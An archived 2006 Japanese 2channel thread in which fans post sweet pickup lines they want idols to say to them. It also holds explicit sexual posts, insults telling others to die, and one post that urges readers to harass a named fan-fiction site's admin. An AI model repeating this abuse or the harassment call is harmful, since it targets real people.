2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

自担に言ってほしいあまぁ〜い言葉2

1 :ユーは名無しネ:2006/08/31(木) 00:19:30
お約束

あまぁ〜い口説き文句を書いてください。

あまぁ〜い口説き文句には、あまぁ〜〜いとレスをつける

前スレ
ttp://tv7.2ch.net/test/read.cgi/jr2/1143729481/


2 :ユーは名無しネ:2006/08/31(木) 00:22:07
>1
お前マジで死ね

3 :ユーは名無しネ:2006/08/31(木) 00:34:20
>1
氏ね

4 :ユーは名無しネ:2006/08/31(木) 01:08:11
>1



5 :ユーは名無しネ:2006/08/31(木) 01:30:41
>>1
スレ立て乙です!

6 :ユーは名無しネ:2006/08/31(木) 01:40:17
1
乙華麗

7 :ユーは名無しネ:2006/08/31(木) 08:52:24
まぁマターリね

8 :ユーは名無しネ:2006/08/31(木) 21:48:31
みんなで遊んで
自担に送ってもらった別れ際

「じゃあな、また明日」
「うん、ありがと!」
「…あっそーだ、1つ言い忘れたことあんだけど」
「なに…?」



「好きだよ。つき合って」

9 :ユーは名無しネ:2006/09/01(金) 01:14:20
>>8
いいね いいね
スゴーだな

zZZ(Θ_Θ)zZ
眠〜゙*+:

10 :ユーは名無しネ:2006/09/01(金) 06:02:08
ペニバン渡されて

こいつで攻めてくれよ

11 :ユーは名無しネ:2006/09/01(金) 06:54:31
耳元で甘く
「好きだよ……ちょっと金貸して?」

12 :ユーは名無しネ:2006/09/01(金) 08:30:13
>>11
ワロタ

13 :ユーは名無しネ:2006/09/01(金) 20:59:54
>>10
けつあな突いてやりて

14 :ユーは名無しネ:2006/09/01(金) 22:57:02
ジュニアじゃないとダメ?
ジュニアじゃない人に言われたい言葉があるんだけど、ジャニ板じゃないから
ためらってしまうわ

15 :ユーは名無しネ:2006/09/01(金) 23:26:41
>>14
名前出さなきゃOKなだけだから言っちゃいな

16 :ユーは名無しネ:2006/09/02(土) 02:19:10
お言葉に甘えて…でもまったく甘くはないよ
私が言ってほしいだけだから
『俺と粘土細工しない?
おいらとの共同作業ね
無の空間が心地いいね
お前と物作ってたら安らぐよ』                      だれかわかっちゃうやんw

17 :ユーは名無しネ:2006/09/02(土) 02:32:49
そのホワホワ感がイイな彼は

18 :ユーは名無しネ:2006/09/02(土) 02:55:48
自担に相談中
泣くのを我慢してる自分に


担「…つーかさ、なんで、泣かないの?」

自「………」

「……てか泣いたら負けるとか、弱いとか…なんか泣いたらダメみたいに言う人もいるけど、…俺はそうは、思わない…」

「………」

「だって泣くって、自分のその悲しい気持ちとか、悔しいとか…嫌な気持ちとか…そういう自分の気持ちを正直に受け止められる、ってことじゃん?
次に進むためにはさ、受け止めるってすごい大切だと思うから…。
その過程で、やっぱ泣くって言うのは…全然、悪いことじゃないと思うから…」

「………」

「だから…さ、……泣きたいときは泣きな?
…泣いて、次は笑えれば、いいじゃん」



19 :ユーは名無しネ:2006/09/02(土) 10:55:52
2押しに自担の事を相談中…
 
「ねぇ〇は好きな人とか居ないの?」
 
『は?今んな話関係ないじゃん』
 
「だっていつも聞いてもらってばっかだし…教えてもらった事無いよなーって…」
 
『言わ…ねぇよ』
 
「何でー?〇なら絶対上手くいくと思うよ」
「こんないい奴他にいないもん」
 
 
 
『じゃあ…』
 
「じゃあ…??」
 
 
 
『じゃあ…アイツやめて俺の女になれよ』 


20 :ユーは名無しネ:2006/09/02(土) 15:19:15
階段を下りるときに階段から落ちそうになった時
誰かが後ろから手をつかみ、助けてくれた。
自分「きゃァ!!!」
自担「大丈夫?怪我はない?」
自分「ごっごめんなさぃっ!!助けてくれてどうもありがとうございます!」
と顔を見るとそれは自担だった。
自分は、驚きすぎて声がでなかった。。
自分&自担「あの・・・!!」
自分「先どうぞ」
自担「僕は後でいいますよ、あなたからどうぞ」
自分 おそるおそる「あの…この後とか時間空いて・・ま すか…?」
自担「ん?どうして??」
自分「良ければお礼に何か食事でも・・・と・・。」
自担「僕もそうしたいナ☆君と話がしてみたいし♪」
飲食店へ着き・・・。
自分「ぁの・・・どうして話がしてみたいなんて言ったのですか??」
自担「・・・知りたいの???」
自分「は、はぃぃ・・・」
自担「あのねぇ・・僕、君に恋しちゃったみたい!!」

こんな事ゆわれると、ぁまくないですかァ??(笑)

21 :ユーは名無しネ:2006/09/02(土) 18:37:04
まとめてあまぁ〜〜い!

22 :ユーは名無しネ:2006/09/02(土) 23:26:33
「テメェまだいたのかとっとと帰れよブス!」
「そんなこと言わないでぇ〜…」
「はぁ?うっせんだよテメェぶっ殺すぞ!」
「うわぁ〜んこわぁ〜い(泣」
「調子こいてんじゃねぇぞコラ!」
「うぅ〜…ごめんなさぁ〜い…」
「わかったんならとっとと出てけカス!」
「…うん、じゃあね…」

と、ドアを開けて出て行こうとすると








「気をつけて帰れよ」

23 :ユーは名無しネ:2006/09/02(土) 23:53:23
↑ドM

24 :ユーは名無しネ:2006/09/03(日) 18:00:18
萌ネタ投下まちage

25 :ユーは名無しネ:2006/09/03(日) 19:54:09
>>22
ハイハイワロ












ハァ-----*´Д`*-----ン!!!!

26 :ユーは名無しネ:2006/09/03(日) 20:02:56
漏れはこのスレにまともなレスできそうにない
なぜなら自担の*に金属バット突っ込みたい人種だからだ

27 :ユーは名無しネ:2006/09/03(日) 20:45:09
子供を作ろう
明日の夜に

28 :ユーは名無しネ:2006/09/03(日) 21:34:10
>>26
それでもかまわない
ただ自担に言われたい言葉をそのまま書き込めばいいんだ

29 :ユーは名無しネ:2006/09/03(日) 22:14:00
>>28
では おことばに甘えて

自担に遭遇
漏れ「すいません ○○さんですか?」
自担「違います」
漏れ「じゃあ○○さんじゃなくても構いません 今空いてますか?」
自担「空いてるけど…」










漏れ「家来いよ」


馬鹿な漏れを許して

30 :ユーは名無しネ:2006/09/06(水) 01:42:41

自「ちょっとなんでさっきからケータイの画面ばっか見てんのよっ!!」


担「だって、待ち受けお前だから」

31 :ユーは名無しネ:2006/09/06(水) 06:47:28
監禁したい

32 :ユーは名無しネ:2006/09/06(水) 13:24:48
>>22
それ、くりぃむしちゅうの有田だろ

33 :ユーは名無しネ:2006/09/06(水) 13:43:58
家でまったり中に・・・

担「ねぇ、耳掃除してよ・・・。」
自「なに?急にw」
担「いいじゃん。俺昔から夢だったの、彼女に膝枕で耳かきしてもらうのw」
自「え・・・?」
担「嫌?」
自「・・ううん、そんなことないよ。・・・でも私、カノジ・・・」
といい掛けた所にふと、ホッペに軽くキス

担「俺の夢、お前にかなえて欲しい・・・駄目かな?」

・・・
自「いいよ、こっちおいでよ」
担「マジで!?やったー!! でも、その前に一言言わせて。
  俺と付き合ってください。」


34 :ユーは名無しネ:2006/09/06(水) 20:11:06
いきなりぽこちんを出されて


最近こいつ元気ないんだよなぁ
お前が元気にしてやってくれよ

35 :ユーは名無しネ:2006/09/06(水) 20:13:47
>33
あまぁ〜〜〜い!
>34
キモ〜〜〜〜〜い!

36 :ユーは名無しネ:2006/09/06(水) 20:55:06
33甘い甘すぎる

37 :ユーは名無しネ:2006/09/06(水) 21:01:12
33
かゆい

38 :ユーは名無しネ:2006/09/06(水) 21:15:05
自担に勉強を教え中…

担「あーもう、わっかんねぇっ!!」
自「なんでよ〜さっきも言ったじゃんかぁ」
「もう覚えらんねぇーよ」
「もう〜…=3」

「だって俺の頭ん中、お前でいっぱいだもん」




39 :ユーは名無しネ:2006/09/06(水) 21:16:15
お前のここ(マソコ)おれの口できれいにしてあげるよ

40 :ユーは名無しネ:2006/09/06(水) 23:16:32
「好きだ」
 
「好きです」
 
「大好き」
 
「めっちゃ好きやねん」
 
「愛してる」
 
「マジで惚れてる」
 
「お前だけやで」
 
「お前は俺だけのもんや」
 
「ずっと傍におってな」
 
 
 
 
 
 
 
「愛してるよベイベー」

41 :ユーは名無しネ:2006/09/07(木) 21:20:12
「アナタノコトガダイスキデス」
と片言で言われたい

42 :ユーは名無しネ:2006/09/08(金) 16:41:17

俺、視力落ちたのかなー…

だってさぁ、








お前以外ぼやけて見えんだよ

43 :ユーは名無しネ:2006/09/09(土) 01:59:49
>>40-42
あま〜〜〜〜い

44 :ユーは名無しネ:2006/09/09(土) 02:12:51
age

45 :ユーは名無しネ:2006/09/09(土) 14:03:11
「アナタニアイタクテ、モドッテキマシタ」

46 :ユーは名無しネ:2006/09/09(土) 15:04:36
俺と一緒に死んでくれ

47 :ユーは名無しネ:2006/09/09(土) 17:09:42
「モウハナレタクナイデス
ボクトイッショニシンデクダサイ」

48 :ユーは名無しネ:2006/09/09(土) 17:12:15
46
>47
そっちの方がいいな

49 :ユーは名無しネ:2006/09/09(土) 18:51:56
「ズットイッショニイタイデス。ダカラThailandにキテクダサイ」

50 :ユーは名無しネ:2006/09/09(土) 19:00:53
「クッサ〜イ ジャニ-ズ クッサ〜イ ブサイクオオイヨ コマッタ クマッタ ウフフノフ。セイシュンデフィ-バ- メラメラナフュ-チャ-ガイイネ ケッコンシテクダサイ オマエ シカイナイ オマエ シカ」

51 :ユーは名無しネ:2006/09/09(土) 19:43:16

担「俺さ…ジュニア辞めたよ」
自「…え?何で!?そんなの、ファンの子たち絶対悲しむよ??」
担「ファンの子も大切だけど、俺が想ってるのはお前だけだし
俺の事想ってくれるのもお前だけでいい。
お前しかいらない」


妄想禿しくてスマソ

52 :ユーは名無しネ:2006/09/09(土) 19:47:04
ゴルマイktkr

53 :ユーは名無しネ:2006/09/09(土) 22:06:04
「ニホンゴデイイマス。アナタヲアイシテル。」

54 :ユーは名無しネ:2006/09/09(土) 22:16:58
ゴルフあま〜〜〜い

55 :ユーは名無しネ:2006/09/09(土) 22:33:56
「顔とか体系は関係ないよ」

デブスな自分にはこの言葉が1番…

56 :ユーは名無しネ:2006/09/10(日) 02:32:07
「ダイスキ!アイシテル!ボクヲスキニナッテクダサイ」

57 :ユーは名無しネ:2006/09/10(日) 11:51:53
マイクktkr

58 :ユーは名無しネ:2006/09/10(日) 13:29:20
「YOU俺のものになっちゃいなよ」

59 :ユーは名無しネ:2006/09/10(日) 14:51:09
JRの掲示板作りましたー。遊びに来てね☆

http://8724.teacup.com/e231/bbs


60 :ユーは名無しネ:2006/09/10(日) 15:17:36
「実は俺五関さん担なんだ」

61 :ユーは名無しネ:2006/09/10(日) 16:04:13
>58がPならGYM ktkr

62 :ユーは名無しネ:2006/09/10(日) 19:10:10
「イッショニフィーバーシマセンカ?」

63 :ユーは名無しネ:2006/09/10(日) 22:40:52
「ダレヨリモアイシテイマス」

64 :ユーは名無しネ:2006/09/11(月) 01:22:18
「ボク、ヨルハハゲシイデスヨ」

65 :ユーは名無しネ:2006/09/11(月) 02:02:09
ゴルマイ ktkr(w
まとめてあま〜い

66 :ユーは名無しネ:2006/09/11(月) 02:08:20
キミノオマソコカワイイヨ

67 :ユーは名無しネ:2006/09/11(月) 02:23:06
「YOUいっちゃいなよ」

68 :ユーは名無しネ:2006/09/11(月) 02:37:03
「モウ…ガマンデキナイデス
イレテモイイデスカ…?」

69 :ユーは名無しネ:2006/09/11(月) 04:05:43
オカネカシテクダサーイ!

70 :ユーは名無しネ:2006/09/11(月) 11:05:04
ゴルマイ担多いんだな(w

71 :ユーは名無しネ:2006/09/11(月) 12:17:45
コラマイクのマイクがたまらなくいい

72 :ユーは名無しネ:2006/09/11(月) 17:02:19
痛いのハッケーン孤独主義っていうジャニの夢小説サイトこれアドレスhttp://solitaryprinciple.web.fc2.com/
マジで管理人生意気。ブッ殺したいくらい笑←この台詞も管理人糞蒼井が言ってた
夢小説嫌い、無くそうって人はここのサイトに乗ってるメールアドレスでどんどん
言ってやってよ。通報するのもよし。なんせ夢小説サイトは違法だから。
夢小説の意味わからない奴は調べてからね 笑

73 :ユーは名無しネ:2006/09/11(月) 20:26:26
マネー マネー!ダセ ハヤクシロ!


74 :ユーは名無しネ:2006/09/11(月) 22:37:52
「ソンナコトバカリイッテルト…オソッチャイマスヨ?」

75 :ユーは名無しネ:2006/09/11(月) 23:02:57
「オシリガ!オシリガカユイデ-ス!」

76 :ユーは名無しネ:2006/09/11(月) 23:13:59
苺「ダカラ カイテ」

77 :ユーは名無しネ:2006/09/12(火) 00:32:27
「手繋ごっか?」
 
 
冷たい手のひらに自担の緊張感が伝わってくる
 
 
そこにはいつもの幼げな表情はなく新たな魅了を放っていた
 
 
 
 
ちょっぴり年上ですがイイですか?○○タソ
 
 
あんな事もこんな事も全部自分が教えてあげるからね(w



78 :ユーは名無しネ:2006/09/12(火) 00:41:45
「アナタヲボクニクダサイ」

79 :ユーは名無しネ:2006/09/12(火) 03:36:43
「ボクトヤマシタクンドッチガスキナンデスカ?」

80 :ユーは名無しネ:2006/09/12(火) 04:52:51
ボクノ ンコタベテ

81 :ユーは名無しネ:2006/09/12(火) 04:55:46
ウンコ?

82 :ユーは名無しネ:2006/09/12(火) 05:02:12
マソコ見せてみろコラァ!

自分でパンツおろせ!

足広げてみろ!

83 :ユーは名無しネ:2006/09/12(火) 06:15:26
>74にボエた

84 :ユーは名無しネ:2006/09/12(火) 06:36:07
ゴルフ甘〜〜〜い

85 :ユーは名無しネ:2006/09/12(火) 11:53:49
「モミモミ イイデスカ?」

86 :ユーは名無しネ:2006/09/12(火) 14:48:48
あるチビ「ぼくのお母さんになって」

87 :ユーは名無しネ:2006/09/12(火) 19:10:15
「俺の歌うパートでさ、さり気なくお前の名前言ったの気付いた?」

88 :ユーは名無しネ:2006/09/12(火) 23:14:07
>85
萌えた

89 :ユーは名無しネ:2006/09/13(水) 00:28:29
あげ

90 :ユーは名無しネ:2006/09/13(水) 05:46:07
「ココ…トッテモグチョグチョデスヨ?ドウシタンデスカ?」

91 :ユーは名無しネ:2006/09/13(水) 13:06:59
「イツニナッタラ、ボクノモノニナッテクレルンデスカ?」

92 :ユーは名無しネ:2006/09/13(水) 13:43:24
なんかゴルフとマイクの専用スレになってないかー?(笑)

93 :ユーは名無しネ:2006/09/13(水) 13:44:50
(笑)←


深山氏ね

94 :ユーは名無しネ:2006/09/13(水) 13:47:07
http://homepage3.nifty.com/kdw/renga_g_192.htm

NHKおよび民放キー局で過去3年間【H16、17、18】に採用された
男性アナ出身大学トップ5

1早稲田 2慶應 3法政 4上智立教 5学習院 



95 :ユーは名無しネ:2006/09/13(水) 17:49:36
>92
女医茶と亜駄無かもしれないだろ

96 :ユーは名無しネ:2006/09/13(水) 18:20:36
>95
ワロタ

97 :ユーは名無しネ:2006/09/14(木) 06:33:09
オチソポ舐めろ!

98 :ユーは名無しネ:2006/09/16(土) 19:59:12
自担が年下のかっぷるの会話





担:『ねぇねぇ、』
私:『なに?』
担:『あのさぁ…一個聞いてもいい?』
私:『ぇ?…なに?』
担:『あのね、俺のこと好き?』
私:『なに突然言い出してるの?』
担:『いいから答えてよ〜』
私:『別に言わなくても付き合ってるんだし…』
担:『だし…?』
私:『いまさら言わなくても…ねぇ』
担:『何で?言ってよ!』
私:『えー…今度ね!』
担:『やだ!今言って!言ってくれなきゃやだ!泣いちゃうよ?』
私:『…恥ずかしいし…』
担:『むーぅ、わかった。もういいよ』
私:『えっ、ちょっ…と待ってよ!どーいう意味?』
担:『もういいって言ってるの!だから…ちゅうしてよ?』
私:『…な、んで、そうなるわけ?』
担:『早くちゅうして?俺のこと好きならさ』


その後の話は勝手に想像しちゃってください。


99 :ユーは名無しネ:2006/09/16(土) 21:59:24
>98
しょーもないねん

100 :ユーは名無しネ:2006/09/17(日) 02:04:08
山涼「好き好き!君を豚箱に入れたい」

101 :ユーは名無しネ:2006/09/17(日) 02:16:16
自担はアリエナスな高身長なので
「ちっちゃい…可愛い」と言ってニコニコしてくれたら最高
自分「〇タンがデッカイ」
自担「好き〜」とニコニコしてくれたら卒倒


102 :ユーは名無しネ:2006/09/17(日) 13:30:36
>98
キモ

103 :ユーは名無しネ:2006/09/17(日) 20:51:01
>101もキモイ

104 :ユーは名無しネ:2006/09/18(月) 00:26:09
>102
>103

突っ込むな
ここはそういうスレだ

105 :ユーは名無しネ:2006/09/18(月) 00:27:13
>98
フトウにモエ

106 :ユーは名無しネ:2006/09/18(月) 01:50:26
>104
きんもー

107 :ユーは名無しネ:2006/09/18(月) 11:31:23
>>100
意味ワカラナスww

108 :ユーは名無しネ:2006/09/19(火) 16:10:05
「へぇ〜………敏感なんだ?」

109 :ユーは名無しネ:2006/09/19(火) 18:27:56
栗「ハァハァハァハァハァハァハァハァハァハァハァハァハァハァハァ」

110 :ユーは名無しネ:2006/09/19(火) 20:21:06
小原「いくら支度はかかってもいい!
僕は、君をずっと待っている」
MJ見てた裕貴くんファンならわかるはず!

111 :ユーは名無しネ:2006/09/19(火) 20:29:12
一生ロムってろ

112 :ユーは名無しネ:2006/09/19(火) 20:39:53
>110
そのコーナーナツカシス!

113 :ユーは名無しネ:2006/09/20(水) 12:18:49
>110
禿懐かしいがここの住人は分かるヤシの方が少ないのは確実だとオモー…

114 :ユーは名無しネ:2006/09/20(水) 12:24:45
別にいいじゃん(w

115 :ユーは名無しネ:2006/09/20(水) 13:57:44
空気嫁ないヲバが数人いる

116 :ユーは名無しネ:2006/09/20(水) 21:56:39
バレンタインの日にチョコを渡してきて

自分「・・・え?何でチョコ・・・?」

「ダッテ日本デハ好キナ人ニチョコヲアゲルンデショ?」

自分「うん、でもそれは女のコが男のコに渡すもので・・・」

「・・・・・」(落ち込んだ表情)

自分「あ!でも・・・くれるの?ありがとう。チョコ好きだし・・・んっ」

自分が必死にフォローしてると突然チス

自分「・・・え?え?」

(ギュッと抱きしめられて)

自分「え、どうしたの?ちょ・・・」

「今スゴク顔赤イカラ・・・見ナイデホシイ・・・」

自分「(可愛いなぁ)」

「アト」

自分「ん?」

「日本デハ2月14日ノ夜ニ愛シ合ッタ恋人達ハ永遠ニ愛シ合エルッテ聞イタンダ」



自分「はい?」

「・・・イイヨネ?」

チョコみたいに甘いセックルGO!


長文な上ただの妄想スマソorz

117 :ユーは名無しネ:2006/09/20(水) 22:52:10
チュー後
「なんや上の空やな…許さへん」
→お決まりの怒涛のオラオラs(ry

118 :ユーは名無しネ:2006/09/20(水) 23:28:12
最近不完全燃焼なレスが多いな
神降臨期待age

119 :ユーは名無しネ:2006/09/20(水) 23:33:33
「一人じゃ無理」

120 :ユーは名無しネ:2006/09/20(水) 23:35:21
>118
無闇にハードル上げんなよ…


121 :ユーは名無しネ:2006/09/20(水) 23:38:12
>119
カバエエ

122 :ユーは名無しネ:2006/09/21(木) 03:46:04
夜電話中


「俺お前の声聞かねぇと寝れなくなっちった」

123 :ユーは名無しネ:2006/09/21(木) 18:55:26
「7時に起こして言うたやん」

124 :ユーは名無しネ:2006/09/21(木) 21:16:14
「ケツ出せ」

125 :ユーは名無しネ:2006/09/21(木) 23:35:53
「骨まで愛してくれますか?」

126 :ユーは名無しネ:2006/09/22(金) 05:50:20
泣いてるとこを自担に見られ
「ちょ…何で泣いてんの?なんかあった?…言いたくなかったら言わなくていいけど……」
「ごめん…大丈夫だから」



その後家に帰ってから自担から電話が
「もしもし…お前大丈夫?」
「大丈夫だよ!」
「…俺、心配でさ……」
「え?」
「…何があったのかとか…お前今ごろ一人で泣いてんじゃねぇかな…とかさ」
「…………(実は泣いてた)」


「頼むから一人で泣くな」

127 :ユーは名無しネ:2006/09/23(土) 06:33:56
「好きやから、ほんまに好きやから…別れよう…それしかもう…考えられへん…グスッ」
最後別れ際唇が触れるだけのキス
「ごめんな…こんな俺で…でも俺にはお前が最後の女やから……幸せになり」
そして自分が見えなくなるまで涙を堪えずっと見送る自担

128 :ユーは名無しネ:2006/09/24(日) 01:27:27
オチソポ丁寧に扱えよ

129 :ユーは名無しネ:2006/09/24(日) 13:42:12
「…襲ってもいい?」

130 :ユー&名無しネ:2006/09/24(日) 16:54:49
>129
おとこわりします。

131 :ユーは名無しネ:2006/09/24(日) 18:13:07
「(名前)君って最高!」

132 :ユーは名無しネ:2006/09/24(日) 18:16:23
単純に
「愛してるよ」
言われたいー!!


133 :ユーは名無しネ:2006/09/24(日) 19:16:32
この人蛇兄タレ?
http://agw.st/i/688963.html 購読したいんだけど誰か意見ないかな??

134 :ユーは名無しネ:2006/09/24(日) 19:38:08
>130
こっちから願い下げです

135 :ユーは名無しネ:2006/09/24(日) 20:16:38
「結婚しよーな!」

136 :ユーは名無しネ:2006/09/24(日) 20:24:03
金玉の裏もだよ!

唾でベトベトになるまで舐めろっ!

137 :ユーは名無しネ:2006/09/24(日) 23:47:41
ピンポーン
 
(…あっ来た!)
 
「お疲れさま」
 
両手で頬に触れる…冷たい手
 
その手に自分の手を重ねる
 
『お前の手あったけぇー(w』
 
そのまま抱き締められる
 
『会いたかった(w』
 
(うわそんな無邪気な笑顔むけられたらもう(ry…)
 
(恥ずかしさと嬉しさを押し殺し…)
 
「お風呂すぐ入れるけどどうする?」
「風邪引いちゃうから入った方がいいんじゃない?」
 
(よし!バレてない)
 
素直に頷く自担
突然耳元に唇を近づけて囁く
 
『1人じゃ嫌だ一緒に入ろ』
 
(ちょ心臓に悪いってば)
 
「…恥ずかしいから嫌だよー!」
 
相当真っ赤になってるであろう自分の顔を覗き込む自担
 
反応を楽しんでる顔だ
(ヤラれた…)
 
「もぅっっ」
 
『お前可愛い過ぎて苛めたくなんだよ(w』
『…駄目だ』
『俺我慢できそうもないや』
 
激しいキス
 
そして彼の手は心臓に一番近い素肌に触れ・・・・・
 
 
 
 
後はお望みのシチュでドゾー

138 :ユーは名無しネ:2006/09/25(月) 00:01:36
言って欲しい―
体重50kg以上で顔面偏差値50以下は
俺らの前に顔見せないでね!

139 :ユーは名無しネ:2006/09/25(月) 00:46:30
俺の上でいやらしく動いて
可愛いい声で喘ぐお前で感じたい


140 :ユーは名無しネ:2006/09/25(月) 00:53:43
小便するとこ見せろよ

141 :ユーは名無しネ:2006/09/25(月) 00:59:46
>140
変態はお断りします!

142 :ユーは名無しネ:2006/09/25(月) 01:00:00
チューしてくれなきゃ仕事行かない
てか行けない

143 :ユーは名無しネ:2006/09/25(月) 01:03:04
>141
ところでおまい誰

144 :ユーは名無しネ:2006/09/25(月) 01:08:05
すげーなお前ケツ穴まで毛生えてんじゃん!

145 :ユーは名無しネ:2006/09/25(月) 01:10:34
妻欄

146 :ユーは名無しネ:2006/09/25(月) 01:15:13
>144
自担に言いたいけどさ

147 :ユーは名無しネ:2006/09/25(月) 01:23:32
栗『オラオラ!もっと痛そうな顔しろよ、このメス豚!』

148 :ユーは名無しネ:2006/09/25(月) 01:26:18
「服脱げ 早くしろ」

149 :ユーは名無しネ:2006/09/25(月) 01:49:03
元ジャニーズです。今はホストで働いてます。小さくて有名な店じゃないけど、いちおNo.1やってます。好きなタイプの女性は鈴木えみ、深田恭子、蛯原友里さんです
皆さん是非遊びに来て下さい

http://imepita.jp/trial/20060924/396040
http://imepita.jp/trial/20060924/508940

150 :ユーは名無しネ:2006/09/25(月) 01:55:30
しね↑

151 :ユーは名無しネ:2006/09/25(月) 18:11:07
お前の体温感じてないと熟睡できひん

152 :ユーは名無しネ:2006/09/25(月) 18:17:19
所詮ホスト


153 :ユーは名無しネ:2006/09/25(月) 20:12:51
「なぁ・・・俺を真っ直ぐ見つめて好きだって言えよ」

154 :ユーは名無しネ:2006/09/25(月) 20:58:15
ぽこちんを顔の前にだされ
お前だからおっ立ってんだよ

155 :ユーは名無しネ:2006/09/26(火) 00:47:22
「コンクリートロードはやめたほうがいいぜ」

156 :ユーは名無しネ:2006/09/28(木) 00:42:15
('A`)

157 :ユーは名無しネ:2006/09/28(木) 04:38:32
a

158 :ユーは名無しネ:2006/09/28(木) 07:14:56
「お、おねが…い、痛くせんで…っ」

159 :ユーは名無しネ:2006/09/28(木) 23:17:04
指を絡めて手を繋ぐ
 
自担の腕にしがみつく
 
自担に肩を抱かれる
 
自担が腰に手を回し密着する
 
 
話し掛けてくる時は首を少し屈めて耳元で
 
自担の甘い声と感じる吐息に腰が砕けそう
 
(ドキドキして顔が熱い…/////身体の芯が痺れてきちゃうよー)
 
そんな自分をまじまじと見つめる自担
 
ソフトデコピン一発
 
!!!!!!
 
「頼むからんなかわいー顔すんの俺の前だけにしてくれよ」

160 :ユーは名無しネ:2006/09/29(金) 01:13:52
あまぁ〜〜い

161 :ユーは名無しネ:2006/09/29(金) 19:56:15
「愛ちてまちゅよ」

162 :ユーは名無しネ:2006/09/29(金) 22:01:43
「俺が欲しいのはお前だけだから」
 
 
「後悔なんて絶対させねぇよ…」
 
 
「お前じゃなきゃ俺が嫌なんだよ!!」
 
 
 
 
 
 
 
「今までの奴らなんて俺の身体で忘れさせてやるよ」
 
 
 
 
 
 
 
 
無論西限定で(w


163 :ユーは名無しネ:2006/09/29(金) 23:52:08
あまぁ〜〜〜〜〜い!

164 :ユーは名無しネ:2006/09/30(土) 01:49:42
良スレage

165 :ユーは名無しネ:2006/09/30(土) 01:54:48
「俺さぁ最近なんかおかしいんだ」
「えっ?どっか体の調子悪いとか?」
「そうじゃなくて、



どうもお前のことしか考えらんないんだわ」

166 :ユーは名無しネ:2006/09/30(土) 03:31:09
あまぁ〜い
age

167 :ユーは名無しネ:2006/09/30(土) 08:05:06
君の〜ものはわ〜僕のもの!
僕の〜ものわ〜僕のものっ!!♪笑

168 :ユーは名無しネ:2006/09/30(土) 13:51:55
デートの帰り
「このまま連れて帰りたいんだけどダメかな?」


169 :ユーは名無しネ:2006/09/30(土) 14:01:36
山田「〇〇〇のくせに生意気な!ギッタンギッタンにしてやる!」


170 :ユーは名無しネ:2006/09/30(土) 18:55:03
>168
勝負下着でついてくノシ

171 :ユーは名無しネ:2006/09/30(土) 19:56:19

「もう大丈夫だよ
菊魔のマソコ縫い付けてやったから」

172 :ユーは名無しネ:2006/09/30(土) 22:23:31
「キミの事を考えるだけで最高の笑顔になれるんだ(w」
 
 
 
「僕の笑顔はキミへのサインだよ」
 
 
 
 
 
山涼チャソ限定で

173 :ユーは名無しネ:2006/09/30(土) 22:41:54
チソチソ気持ち良くしてくんないか

174 :ユーは名無しネ:2006/09/30(土) 22:48:10
(⌒―⌒)俺を夢中にさせるなんて罪つくりな女だな


175 :ユーは名無しネ:2006/09/30(土) 23:21:08
後ろの壁に手をついて顔は至近距離で

「…誘ってんの?」

176 :ユーは名無しネ:2006/09/30(土) 23:33:28
京ズ「僕がいちばん好きなのは〇〇ちゃんだから・・・っ。お嫁さんにしたいと思うのは〇〇ちゃんだけだから・・・」



177 :ユーは名無しネ:2006/09/30(土) 23:35:56
「1日の終わりには必ずお前の傍にいたい」


178 :ユーは名無しネ:2006/09/30(土) 23:47:23
http://idiha.fc2web.com/
キモイサイトとキモイ管理人

179 :ユーは名無しネ:2006/10/01(日) 00:05:36
ねぇ・・・頼むから今すぐウチに来てよ
 
 
 
 
 
お前が隣にいないと眠れない

180 :ユーは名無しネ:2006/10/01(日) 02:45:57
すれ違いざまに耳元で
「あとでお仕置き」

181 :ユーは名無しネ:2006/10/01(日) 09:05:09
うち来る!?

いくいくっ!

182 :ユーは名無しネ:2006/10/01(日) 22:10:33
公衆の面前で突然
自担が耳元で囁く
 
 
「昨日のお前すっげー可愛かったよ」
 
 
身体の隅々まで火照る自分を見つめ
不敵な笑みを浮かべる自担
 
 
(うわヤバイ…きっと顔真っ赤だぁー)
 
 
チュッ
 
 
?!!!!!
 
 
きつく抱き締めながら
「やっべーお前可愛い過ぎ(wまた苛めたくなるじゃん」
 
 
 
 
 
自担に言われてぇー!
こんな自分は℃M認定ですか?



183 :ユーは名無しネ:2006/10/01(日) 22:12:43
きもい

184 :ユーは名無しネ:2006/10/01(日) 22:14:11
http://www.asite2006.com/regist/registry.php

185 :ユーは名無しネ:2006/10/01(日) 22:14:43
長い

186 :ユーは名無しネ:2006/10/01(日) 22:21:44
おチッコ臭いよお前のマソコ
おれの口できれいにしてやっからな

187 :ユーは名無しネ:2006/10/02(月) 00:14:17
ん?

188 :ユーは名無しネ:2006/10/02(月) 00:54:19
真顔でガン見され「愛してるよ」の一言キボン
ストレートな方リアルでイイ

189 :ユーは名無しネ:2006/10/02(月) 02:20:01
おれが洗ってやるよ

190 :ユーは名無しネ:2006/10/02(月) 12:09:58
お前の一番いやらしいトコみせろ

191 :ユーは名無しネ:2006/10/02(月) 20:56:11
「グスっ…グス…ごめんなさい…もうしないの…」

192 :ユーは名無しネ:2006/10/02(月) 22:07:47
自担の部屋に遊びに行って

「あ、言っとくけど今日帰さないから」

193 :ユーは名無しネ:2006/10/03(火) 01:31:33
あまぁ〜〜い梅

194 :ユーは名無しネ:2006/10/03(火) 08:19:33
(一部抜粋)
 
 
複数のヤシらに追いかけられて林の奥へ逃げ込む自分
 
すると白虎隊姿のPが出てきて
 
 
「命に代えても拙者がおぬしを守る」
 
 
 
 
じぬんが見た昨夜の夢話の一部だ(w
萌所満載だたよ
余りのカコエさに余韻がハンパナス


195 :ユーは名無しネ:2006/10/03(火) 19:26:18
西『お前を世界で1番幸せにしてやる』

ストレートがいい(・∀・)
けどエロっちぃ言葉も捨てがたい

196 :ユーは名無しネ:2006/10/03(火) 20:57:16
ここがいっちばん気持ちいいんだろ?



197 :ユーは名無しネ:2006/10/03(火) 21:08:22
「嫌だなあ仕事行くの」
「まだお前とこうしてたい」

198 :ユーは名無しネ:2006/10/03(火) 22:53:57
山涼「大好きです(笑顔)」

中島「大〜好き!(笑顔)」

横尾「好き!大好き!僕には君しかしない!本当!一生守ってやる!だから・・・ん(´ε`)

199 :ユーは名無しネ:2006/10/04(水) 01:32:11
悪い子はお仕置きだな

チソポビンタ!!

200 :ユーは名無しネ:2006/10/04(水) 05:34:29
>199
いつもお前はしょうもないな
はよ氏ねゴキブリ
ウイルスに感染してると言ってるだろヴォケ

201 :ユーは名無しネ:2006/10/04(水) 12:42:49
「俺とお前は見えない鎖で繋がってんねん、絶対切れへんよ」

